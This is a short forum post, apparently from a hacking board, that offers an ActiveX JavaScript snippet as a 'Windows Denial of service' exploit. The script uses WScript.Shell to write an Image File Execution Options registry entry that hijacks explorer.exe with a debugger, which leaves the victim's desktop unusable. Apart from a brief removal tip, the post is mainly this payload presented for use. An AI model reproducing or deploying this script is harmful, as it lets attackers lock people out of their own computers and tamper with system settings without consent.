ActiveX Exploit - Windows Denial of service (1 Viewer)

Joined
Jun 23, 2018
Credits
81
Rating - 0%
If this little script is executed and allowed by the user, his/her computer will be locked when the system invoke explorer.exe (Windows User Interface program).
To bypass this exploit a user needs to call Task Manager with Ctrl+Alt+Del, launch Registry Editor and delete the registry key.

Code:
<script>var denial = 'ntsd -d'; var Shell = new ActiveXObject('WScript.Shell'); Shell.RegWrite('HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe',denial);</script>
 

Users who are viewing this thread

Top